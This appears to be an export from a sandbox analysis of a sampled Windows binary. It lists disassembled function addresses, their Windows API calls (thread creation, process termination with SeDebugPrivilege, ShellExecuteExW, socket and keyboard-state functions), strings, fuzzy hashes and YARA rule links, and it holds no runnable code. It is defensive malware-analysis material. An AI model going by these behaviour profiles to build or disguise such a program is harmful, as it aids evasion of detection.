Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 1ffe7fe612c1f3a211c249ff82104a75d7c792006d0d94207ce600ed4f79de3f
Instruction ID: 42b859a370d5d48b24fbc4bcb6aafe974df156b2174d49cbe334ab32bae213f8
Opcode Fuzzy Hash: 1ffe7fe612c1f3a211c249ff82104a75d7c792006d0d94207ce600ed4f79de3f
Instruction Fuzzy Hash: 5B5183B20087959BC724DBA4DC81EDFB3ECAF85341F10092EF199D3551EF74A6888766

Uniqueness

Uniqueness Score: -1.00%

Function 00C18E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C18A84,00000B00,?,?), ref: 00C18E0C
HeapAlloc.KERNEL32(00000000,?,00C18A84,00000B00,?,?), ref: 00C18E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C18A84,00000B00,?,?), ref: 00C18E28
GetCurrentProcess.KERNEL32(?,00000000,?,00C18A84,00000B00,?,?), ref: 00C18E30
DuplicateHandle.KERNEL32(00000000,?,00C18A84,00000B00,?,?), ref: 00C18E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C18A84,00000B00,?,?), ref: 00C18E43
GetCurrentProcess.KERNEL32(00C18A84,00000000,?,00C18A84,00000B00,?,?), ref: 00C18E4B
DuplicateHandle.KERNEL32(00000000,?,00C18A84,00000B00,?,?), ref: 00C18E4E
CreateThread.KERNEL32(00000000,00000000,00C18E74,00000000,00000000,00000000), ref: 00C18E68

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: caa1042bb0f5a849691a3835c997d325c5ea926a834b16a0e367541793da537c
Instruction ID: aa75b1e49c788b285b67fd7b2608563a619a62032f1d73cc0f9e5be95b68d495
Opcode Fuzzy Hash: caa1042bb0f5a849691a3835c997d325c5ea926a834b16a0e367541793da537c
Instruction Fuzzy Hash: 2801A8B9640308FFE610ABA5DC49F6F3BACFB8A711F004425FA05DB1A1CA7098018A60

Uniqueness

Uniqueness Score: -1.00%

Function 00C39428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3947C
VariantInit.OLEAUT32(?), ref: 00C3954D
VariantInit.OLEAUT32(?), ref: 00C3964E
VariantClear.OLEAUT32(?), ref: 00C39658
VariantClear.OLEAUT32(?), ref: 00C396B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00C39631
Null Object assignment in FOR..IN loop, xrefs: 00C394DD, 00C3960B, 00C396C3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 1031b36b8fb2b198bee992cabfcf8e1ea3468a3dc1444db382e121f68e8b9b2d
Instruction ID: 02381ff27a49e1070216555597195bdd9e8847012406fafe3f35797c731abc0c
Opcode Fuzzy Hash: 1031b36b8fb2b198bee992cabfcf8e1ea3468a3dc1444db382e121f68e8b9b2d
Instruction Fuzzy Hash: 1691D271A10219AFDF21DFA5C849FAEB7B8EF45710F10815DF515AB280D7B09A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C39A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00C17652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?,?,00C1799D), ref: 00C1766F
Part of subcall function 00C17652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?), ref: 00C1768A
Part of subcall function 00C17652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?,?), ref: 00C17698
Part of subcall function 00C17652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C1758C,80070057,?), ref: 00C176A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C39B1B
_memset.LIBCMT ref: 00C39B28
_memset.LIBCMT ref: 00C39C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C39C97
CoTaskMemFree.OLE32(?), ref: 00C39CA2

Strings

NULL Pointer assignment, xrefs: 00C39CF0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 64a7522a823f7187caa065fd9740221311db45e123c68f9b85f4e48e1ae55a13
Instruction ID: 9b95277799497c8b663ef7b6826d0944d47801362f909684e06cb26a4a460738
Opcode Fuzzy Hash: 64a7522a823f7187caa065fd9740221311db45e123c68f9b85f4e48e1ae55a13
Instruction Fuzzy Hash: 5C913971D00229ABDB10DFA5DC85EDEBBB9FF09710F20416AF419A7281DB716A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00C23E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00C23EB6
Part of subcall function 00C23E91: Process32FirstW.KERNEL32(00000000,?), ref: 00C23EC4
Part of subcall function 00C23E91: CloseHandle.KERNEL32(00000000), ref: 00C23F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3ECB8
GetLastError.KERNEL32 ref: 00C3ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C3ED77
GetLastError.KERNEL32(00000000), ref: 00C3ED82
CloseHandle.KERNEL32(00000000), ref: 00C3EDB7

Strings

SeDebugPrivilege, xrefs: 00C3ECD6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 2ae282e90692d894a5c481411ac150ce20695b2654f07074b6ea51e958eae1f0
Instruction ID: f1ecd09062cdebcdad107051d765d4732647079acb5c67e00ba0306876245b46
Opcode Fuzzy Hash: 2ae282e90692d894a5c481411ac150ce20695b2654f07074b6ea51e958eae1f0
Instruction Fuzzy Hash: 1341CA702142019FDB10EF24CC99FAEB7E0AF81710F08806DF8469B3D2DBB4A904DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B958 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00C867B0,00000000,015262D0,?,?,00C867B0,?,00C4B862,?,?), ref: 00C4B9CC
EnableWindow.USER32(00000000,00000000), ref: 00C4B9F0
ShowWindow.USER32(00C867B0,00000000,015262D0,?,?,00C867B0,?,00C4B862,?,?), ref: 00C4BA50
ShowWindow.USER32(00000000,00000004,?,00C4B862,?,?), ref: 00C4BA62
EnableWindow.USER32(00000000,00000001), ref: 00C4BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C4BAA9

Strings

@U=u, xrefs: 00C4BAA9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: ac82a4e1628e33bc37b8d354c638a8317fad7459d2501b3ef35a74a9c8394739
Instruction ID: 9b632a435e601ba1272b79e8d90ab392743068d7c5d4cc62b457097c50d25d68
Opcode Fuzzy Hash: ac82a4e1628e33bc37b8d354c638a8317fad7459d2501b3ef35a74a9c8394739
Instruction Fuzzy Hash: AF413034600241AFDB26CF14C589B997BF1BB1A314F1842B9FA688F6A2C731ED46DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C23226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C232C5

Strings

blank, xrefs: 00C23247
warning, xrefs: 00C232AE
question, xrefs: 00C2327E
stop, xrefs: 00C23296
info, xrefs: 00C23266

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9dd3466cdfcf75723f8161640348ee94881856ab21fc34451c7c11fa3d8abeff
Instruction ID: 3f81a0c0c3d5c7cef3478c47d63f1b8cac1e248ea28baec93e686dbc3e4382ea
Opcode Fuzzy Hash: 9dd3466cdfcf75723f8161640348ee94881856ab21fc34451c7c11fa3d8abeff
Instruction Fuzzy Hash: 431135312083E6FBA7015A56EC42D6EB3DCEF09771F20002AF404A65C3EB696B0045A6

Uniqueness

Uniqueness Score: -1.00%

Function 00C24534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C2454E
LoadStringW.USER32(00000000), ref: 00C24555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C2456B
LoadStringW.USER32(00000000), ref: 00C24572
_wprintf.LIBCMT ref: 00C24598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C245B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C24593

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 4aba997c28239db43a603c2d7e41bf85594ba8c8b58860c6c8dd712a178111bf
Instruction ID: e3949a7939ce969cceead5a0adccffad5e243550b3460a8887a1488b5c3f908f
Opcode Fuzzy Hash: 4aba997c28239db43a603c2d7e41bf85594ba8c8b58860c6c8dd712a178111bf
Instruction Fuzzy Hash: 13014FF6900218BFE710E7A09D89FEB776CE708301F0005B9BB49E2051EA749E868B70

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC417,00000004,00000000,00000000,00000000), ref: 00BC2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00BFC417,00000004,00000000,00000000,00000000,000000FF), ref: 00BC2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00BFC417,00000004,00000000,00000000,00000000), ref: 00BFC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC417,00000004,00000000,00000000,00000000), ref: 00BFC4D6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: fa723be79bca4e85f963deaffaab8801d20ab29656fd75f33c098eab6e76eaf6
Instruction ID: fd30f527ac962891d6f1ab1a8a8dfd02f435afb1bc16ee703bd453fa674b4c08
Opcode Fuzzy Hash: fa723be79bca4e85f963deaffaab8801d20ab29656fd75f33c098eab6e76eaf6
Instruction Fuzzy Hash: 1E41D831604A849AC7398B289DD8F7B7FD2FF46310F14889DF157876A1C6759886D710

Uniqueness

Uniqueness Score: -1.00%

Function 00C27368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C2737F

Part of subcall function 00BE0FF6: std::exception::exception.LIBCMT ref: 00BE102C
Part of subcall function 00BE0FF6: __CxxThrowException@8.LIBCMT ref: 00BE1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C273B6
EnterCriticalSection.KERNEL32(?), ref: 00C273D2
_memmove.LIBCMT ref: 00C27420
_memmove.LIBCMT ref: 00C2743D
LeaveCriticalSection.KERNEL32(?), ref: 00C2744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C27461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C27480

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: b0c3001befbfea4d4992399b0cfe06f8640e423f935c465ab0eb47ef431a1697
Instruction ID: 85f8992d085494ef7142eafcced3d6f2077a4108ae7bbcbb4606305b1c86cc34
Opcode Fuzzy Hash: b0c3001befbfea4d4992399b0cfe06f8640e423f935c465ab0eb47ef431a1697
Instruction Fuzzy Hash: BC31AF35904205EBCF10EF69DC85BAFBBB8FF45710B2441A9F904AB246DB70DA51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C1C087
_memcmp.LIBCMT ref: 00C1C0A9
_memcmp.LIBCMT ref: 00C1C0C1
_memcmp.LIBCMT ref: 00C1C0D4
_memcmp.LIBCMT ref: 00C1C0EE
_memcmp.LIBCMT ref: 00C1C101
_memcmp.LIBCMT ref: 00C1C119
_memcmp.LIBCMT ref: 00C1C134

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a292d977b70ced6c9d9b6f12e60f06e21d9e9eb1cfe5dde06fa0f6f3981556e8
Instruction ID: 14d0bff7f51b335a030a13713dcbb8242e42b66baffcf60a4512becd41c75660
Opcode Fuzzy Hash: a292d977b70ced6c9d9b6f12e60f06e21d9e9eb1cfe5dde06fa0f6f3981556e8
Instruction Fuzzy Hash: 0821F6767C1205BBE210A5268CC2FFF33DCAF27395B240020FD0996283E765DE95E1A9

Uniqueness

Uniqueness Score: -1.00%

Function 00C2ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

Part of subcall function 00BDFEC6: _wcscpy.LIBCMT ref: 00BDFEE9

_wcstok.LIBCMT ref: 00C2EEFF
_wcscpy.LIBCMT ref: 00C2EF8E
_memset.LIBCMT ref: 00C2EFC1

Strings

X, xrefs: 00C2EFFE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 753f10835c549855b112b5e57bcfe7ff321d7fd79ac9f3756c41084c5ee2b189
Instruction ID: 474f0c7d9420a92627cd20ad9b214f3e3b5db4bc7afba4acaaa319164bc0ef40
Opcode Fuzzy Hash: 753f10835c549855b112b5e57bcfe7ff321d7fd79ac9f3756c41084c5ee2b189
Instruction Fuzzy Hash: F8C16A715083519FD724EF24D885E5EB7E4EF84310F0049ADF8AA9B6A2DB70ED45CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00C36E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C36F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C36F35
WSAGetLastError.WSOCK32(00000000), ref: 00C36F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00C36FFE
inet_ntoa.WSOCK32(?), ref: 00C36FBB

Part of subcall function 00C1AE14: _strlen.LIBCMT ref: 00C1AE1E
Part of subcall function 00C1AE14: _memmove.LIBCMT ref: 00C1AE40

_strlen.LIBCMT ref: 00C37058
_memmove.LIBCMT ref: 00C370C1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: a0332ee66e234875ae6592f8255d9f378cc10aaedb0a72efed63ac16162eb447
Instruction ID: d014f2fdeccfb22e742b57dfec6f5bc4834dc29acb0e9abe94f59a707c256494
Opcode Fuzzy Hash: a0332ee66e234875ae6592f8255d9f378cc10aaedb0a72efed63ac16162eb447
Instruction Fuzzy Hash: 3081D071508300ABD724EB24CC86F6FB7E9AF84714F108A5CF5659B292DB70EE45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d335be041a0fafe1d2bd2954de5bce096666da62af5310d0c399305606478959
Instruction ID: 7572897b8a55733171b29372f3ec8a4bff6be210545445b90f9963bb719b1a16
Opcode Fuzzy Hash: d335be041a0fafe1d2bd2954de5bce096666da62af5310d0c399305606478959
Instruction Fuzzy Hash: A4716B74900109EFCB048F99CC84FBEBBB9FF86314F108599F915AA252C734AA51CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C3F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3F75C
_memset.LIBCMT ref: 00C3F825
ShellExecuteExW.SHELL32(?), ref: 00C3F86A

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

Part of subcall function 00BDFEC6: _wcscpy.LIBCMT ref: 00BDFEE9

GetProcessId.KERNEL32(00000000), ref: 00C3F8E1
CloseHandle.KERNEL32(00000000), ref: 00C3F910

Strings

@, xrefs: 00C3F839

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 46f0dac18c855a28558ee6731cbff61c855d167c4a7fe758a97b06412f291e60
Instruction ID: 5a5e12ee331d8df8f5a6bdde637b707a89eb54039386245d90c4d9f8ff38dafc
Opcode Fuzzy Hash: 46f0dac18c855a28558ee6731cbff61c855d167c4a7fe758a97b06412f291e60
Instruction Fuzzy Hash: F7618C75E006199FCB14EF55C484AAEBBF4FF49710F1584ADE85AAB391CB30AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C2145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C2149C
GetKeyboardState.USER32(?), ref: 00C214B1
SetKeyboardState.USER32(?), ref: 00C21512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C21540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C2155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C215A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C215C8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

